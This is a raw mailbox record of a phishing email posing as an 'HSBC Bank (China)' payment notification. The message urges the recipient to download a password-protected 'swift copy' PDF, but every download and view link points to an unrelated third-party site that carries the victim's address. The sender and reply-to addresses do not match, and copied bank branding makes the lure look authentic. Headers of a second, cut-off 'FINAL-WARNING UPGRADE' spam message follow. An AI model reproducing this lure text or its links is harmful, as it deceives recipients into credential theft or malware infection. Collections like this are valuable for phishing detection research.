From: HSBC Bank <finance@hsbc.com.cn>
Date: Tue, 06 Jun 2017 06:30:07 -0700
Reply-To: harrysmith2k2@gmail.com
Message-Id: <20170606133014.ECC11123AA2@www.doreiku.com>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 210

You will not see this in a MIME-aware mail reader.
--===============1940740223==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

    Greetings
  =

 ****** Payment Notification From  HSBC Bank (China)  ******
  On request of your client, please download attached swift copy pdf with p=
assword protection for security reasons as details. We have an effective pa=
yment in wire Transfer Ref: 945334XXX / 54267XXX..
  =

  =

 More details Attached. .
 =

  =

      24267-2099/swift copy.....pdf..-175KB
               Download      View Online
  =

  =

           Thanks & Best Regards.
 Global Remmitance Officer,
 Jack Chang
HSBC Bank (China) =

 282 Huaihai Middle Rd
Shanghai Shi: =B7 +86 400-820-8828
Open until 10 AM-7PM
   =A9 Copyright. HSBC Bank (China) Company Limited 2017. All rights reserv=
ed.
ICP 15029387-2 Address and domain name filed in the information record mana=
gement system of the Ministry of Industry and Information Technology (Chine=
se Only)

--===============1940740223==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/><title>adode reader</title></head><body><DIV id=3Dyui_3_16_0_1_1=
412356872585_2015>
<TABLE id=3Dyiv3314270550ecxyiv5655158795yui_3_16_0_1_1403131809779_3137 cl=
ass=3Dyiv3314270550yui_3_16_0_1_1409579782119_5349 style=3D"WIDTH: 641px; M=
IN-HEIGHT: 554px" cellSpacing=3D0 cellPadding=3D0 width=3D581 bgColor=3D#df=
dfdf border=3D0><!--DWLayoutTable-->
<TBODY id=3Dyiv3314270550ecxyiv5655158795yui_3_16_0_1_1403131809779_3136>
<TR id=3Dyiv3314270550ecxyiv5655158795yui_3_16_0_1_1403131809779_3135>
<TD id=3Dyiv3314270550ecxyiv5655158795yui_3_16_0_1_1403131809779_3134 bgCol=
or=3D#ffffff height=3D579 vAlign=3Dtop width=3D581>
<P style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Hel=
vetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADD=
ING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; M=
ARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: block; LETTER-SPACING: normal; =
LINE-HEIGHT: 1.5; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial; -webkit-padding-start: 0px'><SPAN style=3D"FONT-SIZE:=
 11px; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-W=
EIGHT: bold; COLOR: rgb(51,51,51); FONT-STYLE: normal; LINE-HEIGHT: 1.6em; =
font-variant-ligatures: normal; font-variant-caps: normal; -webkit-padding-=
start: 0px"><FONT style=3D"-webkit-padding-start: 0px" size=3D3 face=3D"Tim=
es New Roman"><FONT size=3D+0><FONT size=3D+0>Greetings</FONT></FONT></FONT=
></SPAN></P>
<P style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Hel=
vetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADD=
ING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; M=
ARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: block; LETTER-SPACING: normal; =
LINE-HEIGHT: 1.5; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial; -webkit-padding-start: 0px'><SPAN style=3D"FONT-SIZE:=
 11px; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-W=
EIGHT: bold; COLOR: rgb(51,51,51); FONT-STYLE: normal; LINE-HEIGHT: 1.6em; =
font-variant-ligatures: normal; font-variant-caps: normal; -webkit-padding-=
start: 0px"><FONT size=3D3 face=3D"Times New Roman"></FONT></SPAN>&nbsp;</P>
<P style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Hel=
vetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADD=
ING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; M=
ARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: block; LETTER-SPACING: normal; =
LINE-HEIGHT: 1.5; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial; -webkit-padding-start: 0px'><FONT style=3D"-webkit-pa=
dding-start: 0px" size=3D3 face=3D"Times New Roman"><FONT size=3D+0><FONT s=
ize=3D+0>****** Payment Notification From&nbsp;<SPAN class=3DApple-converte=
d-space>&nbsp;</SPAN></FONT></FONT><STRONG style=3D"FONT-WEIGHT: 700; -webk=
it-padding-start: 0px"><FONT size=3D+0><FONT size=3D+0>HSBC&nbsp;Bank (Chin=
a)</FONT></FONT></STRONG><FONT size=3D+0><FONT size=3D+0><SPAN class=3DAppl=
e-converted-space>&nbsp;</SPAN>&nbsp;******</FONT></FONT></FONT></P>
<P style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Hel=
vetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADD=
ING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; M=
ARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: block; LETTER-SPACING: normal; =
LINE-HEIGHT: 1.5; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial; -webkit-padding-start: 0px'><FONT style=3D"-webkit-pa=
dding-start: 0px" size=3D3 face=3D"Times New Roman"><FONT size=3D+0><FONT s=
ize=3D+0>&nbsp;On request of your client, please download attached swift co=
py&nbsp;pdf with password protection for security reasons as details.<SPAN =
class=3DApple-converted-space>&nbsp;</SPAN></FONT><FONT size=3D+0>We have a=
n effective payment in wire Transfer Ref: 945334XXX / 54267XXX..</FONT></FO=
NT></FONT></P>
<P style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Hel=
vetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADD=
ING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; M=
ARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: block; LETTER-SPACING: normal; =
LINE-HEIGHT: 1.5; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial; -webkit-padding-start: 0px'><FONT size=3D3 face=3D"Ti=
mes New Roman"></FONT>&nbsp;</P>
<P style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Hel=
vetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADD=
ING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; M=
ARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: block; LETTER-SPACING: normal; =
LINE-HEIGHT: 1.5; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial; -webkit-padding-start: 0px'><FONT size=3D3 face=3D"Ti=
mes New Roman"></FONT>&nbsp;</P>
<P style=3D'FONT-SIZE: 13px; FONT-FAMILY: "Helvetica Neue", "Segoe UI", Hel=
vetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADD=
ING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; M=
ARGIN: 0px; ORPHANS: 2; WIDOWS: 2; DISPLAY: block; LETTER-SPACING: normal; =
LINE-HEIGHT: 1.5; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial; -webkit-padding-start: 0px'><FONT size=3D3 face=3D"Ti=
mes New Roman"><SPAN style=3D'FONT-SIZE: medium; FONT-FAMILY: "Times New Ro=
man"; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FLOAT: =
none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: =
2; WIDOWS: 2; DISPLAY: inline !important; LETTER-SPACING: normal; BACKGROUN=
D-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal=
; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoratio=
n-style: initial; text-decoration-color: initial'><FONT size=3D+0><FONT cla=
ss=3Dgoog-text-highlight style=3D"BOX-SIZING: border-box; POSITION: relativ=
e; BACKGROUND-COLOR: rgb(201,215,241); box-shadow: rgb(153, 153, 170) 2px 2=
px 4px">More details Attached.<SPAN class=3DApple-converted-space>&nbsp;</S=
PAN></FONT></FONT></SPAN><FONT style=3D'FONT-SIZE: medium; FONT-FAMILY: "Ti=
mes New Roman"; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: non=
e; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; =
WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-d=
ecoration-style: initial; text-decoration-color: initial'><FONT size=3D+0>.=
</FONT></FONT></FONT></P>
<P></P>
<P><A href=3D"http://plano4.eng.br/index/?fukk=3Djose@monkey.org"><IMG styl=
e=3D"HEIGHT: 131px; WIDTH: 136px" src=3D"http://vignette4.wikia.nocookie.ne=
t/logopedia/images/e/ee/Adobe_Reader_v9.0_icon.png/revision/latest?cb=3D201=
31110012408" width=3D86 height=3D86></A> <A href=3D"http://plano4.eng.br/in=
dex/?fukk=3Djose@monkey.org"><IMG style=3D"HEIGHT: 131px; WIDTH: 165px" src=
=3D"http://www.therealgroupacademy.se/wp-content/uploads/2015/02/pdf_symbol=
_jk-150x150.jpg" width=3D86 height=3D86></A></P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;24267-2099/swift copy.....pdf..-175KB</P>
<P>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbs=
p;<A href=3D"http://plano4.eng.br/index/?fukk=3Djose@monkey.org">Download</=
A>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<A href=3D"http://plano4.eng.br/index=
/?fukk=3Djose@monkey.org">View Online</A></P>
<P>&nbsp;</P>
<DIV style=3D'FONT-SIZE: 12px; FONT-FAMILY: =EB=8F=8B=EC=9B=80, Dotum, Helv=
etica, "Apple SD Gothic Neo", sans-serif; WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(51,51,51); FON=
T-STYLE: normal; MARGIN: 0cm 0cm 0pt; ORPHANS: 2; WIDOWS: 1; LETTER-SPACING=
: normal; LINE-HEIGHT: 1.5; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT=
: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-t=
ext-stroke-width: 0px; text-decoration-style: initial; text-decoration-colo=
r: initial'><FONT size=3D3 face=3D??><SPAN lang=3DEN-US style=3D"FONT-SIZE:=
 12pt">
<HR style=3D"WIDTH: 157.5pt" align=3Dleft SIZE=3D1 width=3D210>
</SPAN></FONT></DIV>
<DIV style=3D'FONT-SIZE: 11px; FONT-FAMILY: =EB=8F=8B=EC=9B=80, Dotum, Helv=
etica, "Apple SD Gothic Neo", sans-serif; WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(51,51,51); FON=
T-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; LINE-HEIGHT=
: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-varian=
t-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: =
0px; text-decoration-style: initial; text-decoration-color: initial'>
<DIV style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 1.5; BORDER-TOP-WIDTH: 0px">
<DIV style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 1.5; BORDER-TOP-WIDTH: 0px"><B=
><FONT color=3Dgray size=3D2 face=3DTahoma><SPAN lang=3DEN-US style=3D"FONT=
-SIZE: 11pt; FONT-FAMILY: Tahoma, sans-serif; FONT-WEIGHT: bold; COLOR: gra=
y"><SPAN lang=3DEN-US style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Tahoma, sans-s=
erif; FONT-WEIGHT: bold; COLOR: gray; -webkit-padding-start: 0px"><SPAN lan=
g=3DEN-US style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Tahoma, sans-serif; FONT-W=
EIGHT: bold; COLOR: gray; -webkit-padding-start: 0px"></SPAN></SPAN></SPAN>=
</FONT>
<DIV style=3D'FONT-SIZE: 11px; FONT-FAMILY: =EB=8F=8B=EC=9B=80, Dotum, Helv=
etica, "Apple SD Gothic Neo", sans-serif; WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(51,51,51); FON=
T-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; LINE-HEIGHT=
: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-pad=
ding-start: 0px'><FONT color=3Dgray size=3D2 face=3DTahoma></FONT>
<DIV style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 1.5; BORDER-TOP-WIDTH: 0px; -w=
ebkit-padding-start: 0px"><FONT color=3Dgray size=3D2 face=3DTahoma></FONT>
<DIV style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 1.5; BORDER-TOP-WIDTH: 0px; -w=
ebkit-padding-start: 0px"><FONT color=3Dgray size=3D2 face=3DTahoma><B styl=
e=3D"-webkit-padding-start: 0px"><FONT style=3D"-webkit-padding-start: 0px"=
 color=3Dgray size=3D2 face=3DTahoma><SPAN lang=3DEN-US style=3D"FONT-SIZE:=
 11pt; FONT-FAMILY: Tahoma, sans-serif; FONT-WEIGHT: bold; COLOR: gray; -we=
bkit-padding-start: 0px"><FONT style=3D"-webkit-padding-start: 0px" size=3D=
+0><FONT style=3D"-webkit-padding-start: 0px" size=3D+0><SPAN lang=3DEN-US =
style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Tahoma, sans-serif; FONT-WEIGHT: bol=
d; COLOR: gray; -webkit-padding-start: 0px">
<DIV style=3D'FONT-SIZE: 11px; FONT-FAMILY: =EB=8F=8B=EC=9B=80, Dotum, Helv=
etica, "Apple SD Gothic Neo", sans-serif; WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(51,51,51); FON=
T-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; LINE-HEIGHT=
: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-pad=
ding-start: 0px'>
<DIV style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 1.5; BORDER-TOP-WIDTH: 0px; -w=
ebkit-padding-start: 0px">
<DIV style=3D"PADDING-TOP: 0px; LINE-HEIGHT: 1.5; BORDER-TOP-WIDTH: 0px; -w=
ebkit-padding-start: 0px">
<P style=3D"FONT-SIZE: 12pt; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING=
-LEFT: 0px; MARGIN: 0cm 0cm 0pt; DISPLAY: block; LINE-HEIGHT: 1.5; PADDING-=
RIGHT: 0px; -webkit-padding-start: 0px"><B style=3D"-webkit-padding-start: =
0px"><FONT style=3D"-webkit-padding-start: 0px" color=3Dgray size=3D2 face=
=3DTahoma><SPAN lang=3DEN-US style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Tahoma,=
 sans-serif; FONT-WEIGHT: bold; COLOR: gray; -webkit-padding-start: 0px"><F=
ONT style=3D"-webkit-padding-start: 0px" size=3D+0><FONT style=3D"-webkit-p=
adding-start: 0px" size=3D+0><FONT size=3D+0><FONT size=3D+0>Thanks &amp; B=
est Regards.</FONT></FONT></FONT></FONT></SPAN></FONT></B><FONT style=3D"-w=
ebkit-padding-start: 0px" color=3Dblack><SPAN lang=3DEN-US style=3D"COLOR: =
black; -webkit-padding-start: 0px"></SPAN></FONT></P>
<P style=3D"FONT-SIZE: 12pt; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING=
-LEFT: 0px; MARGIN: 0cm 0cm 0pt; DISPLAY: block; LINE-HEIGHT: 1.5; PADDING-=
RIGHT: 0px; -webkit-padding-start: 0px"><FONT style=3D"-webkit-padding-star=
t: 0px" color=3Dblack size=3D3 face=3D??><SPAN lang=3DEN-US style=3D"FONT-S=
IZE: 12pt; COLOR: black; -webkit-padding-start: 0px"><FONT size=3D+0><FONT =
size=3D+0>Global Remmitance Officer,</FONT></FONT></SPAN></FONT></P>
<P style=3D"FONT-SIZE: 12pt; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING=
-LEFT: 0px; MARGIN: 0cm 0cm 0pt; DISPLAY: block; LINE-HEIGHT: 1.5; PADDING-=
RIGHT: 0px; -webkit-padding-start: 0px"><FONT style=3D"-webkit-padding-star=
t: 0px" color=3Dblack size=3D3 face=3D??><SPAN lang=3DEN-US style=3D"FONT-S=
IZE: 12pt; COLOR: black; -webkit-padding-start: 0px"><FONT size=3D+0><FONT =
size=3D+0>Jack Chang</FONT></FONT></SPAN></FONT><FONT style=3D"-webkit-padd=
ing-start: 0px" color=3Dblack size=3D3 face=3D??><SPAN lang=3DEN-US style=
=3D"FONT-SIZE: 12pt; COLOR: black; -webkit-padding-start: 0px"><BR style=3D=
"-webkit-padding-start: 0px"><FONT size=3D+0><FONT size=3D+0>HSBC Bank (Chi=
na)<SPAN class=3DApple-converted-space>&nbsp;</SPAN></FONT></FONT></SPAN></=
FONT></P>
<P style=3D"FONT-SIZE: 12pt; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING=
-LEFT: 0px; MARGIN: 0cm 0cm 0pt; DISPLAY: block; LINE-HEIGHT: 1.5; PADDING-=
RIGHT: 0px; -webkit-padding-start: 0px"><FONT style=3D"-webkit-padding-star=
t: 0px" color=3Dblack size=3D3 face=3D??><SPAN lang=3DEN-US style=3D"FONT-S=
IZE: 12pt; COLOR: black; -webkit-padding-start: 0px"><FONT size=3D+0><FONT =
size=3D+0><SPAN class=3DApple-converted-space>282 Huaihai Middle Rd</SPAN><=
/FONT></FONT><BR style=3D"-webkit-padding-start: 0px"><FONT size=3D+0><FONT=
 size=3D+0>Shanghai Shi: =C2=B7 +86 400-820-8828</FONT></FONT><BR style=3D"=
-webkit-padding-start: 0px"><FONT size=3D+0><FONT size=3D+0>Open until 10 A=
M-7PM</FONT></FONT></SPAN></FONT></SPAN></FONT></FONT></SPAN></FONT></B></F=
ONT></B></P></DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV></DIV>
<DIV class=3D"header-logo lg-2"><A href=3D"https://personal.hsbc.com.cn/en-=
cn/"><IMG style=3D"HEIGHT: 64px; WIDTH: 203px" alt=3D"HSBC Logo" src=3D"htt=
ps://personal.hsbc.com.cn/content/dam/hsbc/cn/hsbc-logo/hsbc_logo_en.png" w=
idth=3D136 height=3D41> </A></DIV>
<P>=C2=A9 Copyright. HSBC Bank (China) Company Limited 2017. All rights res=
erved.<BR><A href=3D"http://www.miibeian.gov.cn/" rel=3Dnoopener target=3D_=
blank>ICP 15029387-2 Address and domain name filed in the information recor=
d management system of the Ministry of Industry and Information Technology =
(Chinese Only)</A></P></TD></TR></TBODY></TABLE></DIV></BODY></HTML>
--===============1940740223==--

From jose@monkey.org Wed Jun  7 11:34:43 2017 +0000
Return-Path: no-reply@hotmail.com
Delivered-To: jose@monkey.org
X-FDA: 72925043646.04.boats16_2920e09455448
X-Spam-Summary: 75,0,0,49f2b4f990a596bd,d41d8cd98f00b204,no-reply@hotmail.com,:no-reply@hotmail.com,RULES_HIT:1:41:72:355:379:581:591:962:967:969:983:988:989:1189:1208:1221:1260:1261:1313:1314:1345:1381:1431:1433:1434:1436:1437:1516:1517:1518:1568:1571:1575:1588:1589:1592:1594:1714:1730:1777:1792:2194:2196:2198:2199:2200:2201:2525:2527:2559:2563:2610:2636:2682:2685:2693:2737:2859:2894:2895:2902:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3245:3867:3868:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4361:4552:5007:6687:6996:6997:8603:8797:8957:9025:9121:9390:9416:9908:10214:10346:11233:11473:11658:11914:12043:12295:12438:12555:12561:12660:12740:12895:12903:12986:13139:13439:14096:14246:14515:14877:21080:21433:21451:21483:21524:21611:21627:30021:30022:30026:30054:30069:30070,0,RBL:46.183.222.10-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custo
X-HE-Tag: boats16_2920e09455448
X-Filterd-Recvd-Size: 12420
Received: from IP-222-10.dataclub.biz (unknown [46.183.222.10])
	by imf22.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  7 Jun 2017 11:34:42 +0000 (UTC)
Received: from IP-222-10.dataclub.biz ([127.0.0.1]) by IP-222-10.dataclub.biz with Microsoft SMTPSVC(8.5.9600.16384);
	 Wed, 7 Jun 2017 14:34:35 +0300
Content-Type: multipart/alternative; boundary="===============0527058459=="
MIME-Version: 1.0
Subject: FINAL-WARNING ++++++++++++++++++++++ UPGRADE
To: Recipients <no-reply@hotmail.com>
